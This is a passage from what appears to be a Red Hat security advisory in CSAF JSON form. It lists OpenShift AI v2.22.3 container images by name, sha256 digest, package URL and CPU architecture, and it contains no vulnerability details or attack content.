"name": "registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"product_id": "registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256%3Ac7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764181290"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"product_id": "registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-data-science-pipelines-operator-controller-rhel9@sha256%3Af27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764609238"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"product_id": "registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-feast-operator-rhel9@sha256%3A3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1763051808"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64",
"product_id": "registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-feature-server-rhel9@sha256%3Ad5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1763565765"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"product_id": "registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-kf-notebook-controller-rhel9@sha256%3A687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764609614"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"product_id": "registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-kuberay-operator-controller-rhel9@sha256%3A2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764609723"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"product_id": "registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-kueue-controller-rhel9@sha256%3Ab7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764609729"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"product_id": "registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-ml-pipelines-api-server-v2-rhel9@sha256%3A854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764594321"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"product_id": "registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-ml-pipelines-driver-rhel9@sha256%3Af092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764594321"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"product_id": "registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-ml-pipelines-launcher-rhel9@sha256%3A46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764594321"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"product_id": "registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256%3A3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764594321"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"product_id": "registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-ml-pipelines-runtime-generic-rhel9@sha256%3A65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764293130"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"product_id": "registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256%3A8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764594321"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"product_id": "registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-mlmd-grpc-server-rhel9@sha256%3Abfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764594262"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"product_id": "registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-mm-rest-proxy-rhel9@sha256%3A974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764594154"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"product_id": "registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-model-controller-rhel9@sha256%3A65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764665999"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"product_id": "registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-model-registry-operator-rhel9@sha256%3A901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764594440"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"product_id": "registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-model-registry-rhel9@sha256%3Ae0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764594496"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64",
"product_id": "registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-modelmesh-runtime-adapter-rhel9@sha256%3A1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764594508"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"product_id": "registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-modelmesh-serving-controller-rhel9@sha256%3A4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764594518"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"product_id": "registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-modelmesh-rhel9@sha256%3Aa3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764594760"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"product_id": "registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-notebook-controller-rhel9@sha256%3Ae940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764609614"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"product_id": "registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-operator-bundle@sha256%3Abd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764669970"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"product_id": "registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-rhel9-operator@sha256%3Aa54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764669148"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"product_id": "registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-training-operator-rhel9@sha256%3A251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764595822"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"product_id": "registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-trustyai-service-operator-rhel9@sha256%3A3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1763639678"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64",
"product_id": "registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-trustyai-service-rhel9@sha256%3A51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764596318"
}
}
}
],
"category": "architecture",
"name": "amd64"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"product": {
"name": "registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"product_id": "registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odh-dashboard-rhel9@sha256%3Abbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259?arch=ppc64le\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764637896"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"product": {
"name": "registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"product_id": "registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odh-model-controller-rhel9@sha256%3Af43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773?arch=ppc64le\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764665999"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"product": {
"name": "registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"product_id": "registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odh-rhel9-operator@sha256%3A67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda?arch=ppc64le\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764669148"
}
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"product": {
"name": "registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"product_id": "registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odh-dashboard-rhel9@sha256%3A3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b?arch=s390x\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764637896"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"product": {
"name": "registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"product_id": "registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odh-model-controller-rhel9@sha256%3A0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab?arch=s390x\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764665999"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"product": {
"name": "registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"product_id": "registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odh-rhel9-operator@sha256%3A8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d?arch=s390x\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764669148"
}
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"product": {
"name": "registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"product_id": "registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"product_identification_helper": {
"purl": "pkg:oci/odh-dashboard-rhel9@sha256%3Afe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926?arch=arm64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764637896"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"product": {
"name": "registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"product_id": "registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"product_identification_helper": {
"purl": "pkg:oci/odh-model-controller-rhel9@sha256%3A0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667?arch=arm64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764665999"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"product": {
